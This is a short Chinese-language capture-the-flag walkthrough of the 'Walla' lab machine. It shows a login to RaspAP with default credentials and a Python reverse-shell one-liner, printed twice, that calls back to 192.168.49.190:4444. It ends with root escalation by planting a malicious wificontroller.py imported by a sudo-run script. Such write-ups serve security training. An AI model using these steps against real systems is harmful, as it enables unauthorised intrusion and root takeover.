当前位置: 代码迷 >> 综合 >> Offensive Walla 靶机渗透
  详细解决方案

Offensive Walla 靶机渗透

热度:29   发布时间:2023-10-22 01:39:41.0

一、信息收集

nmap扫描靶机

Offensive Walla 靶机渗透

 访问8091端口,提示raspap。查询默认用户名密码为admin:secretOffensive Walla 靶机渗透

 输入后成功登录raspap

二、web渗透

登陆RaspAp管理页面,在system模块中发现了控制台。

Offensive Walla 靶机渗透

获取local.txt

Offensive Walla 靶机渗透

三、提权

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.190",4444));os.dup2(s.fileno(),0
); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR
EAM);s.connect(("192.168.49.190",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

采用python反弹shell到本地,并切换为交互shell

Offensive Walla 靶机渗透

查看系统版本与suid均未发现可提权方法。

发现wifi_reset.py 为root用户

Offensive Walla 靶机渗透

 Offensive Walla 靶机渗透

 发现import wificontroller

伪造包

echo "__import__('os').system('sh')">>wificontroller.py

sudo提权

sudo /usr/bin/python /home/walter/wifi_reset.py

Offensive Walla 靶机渗透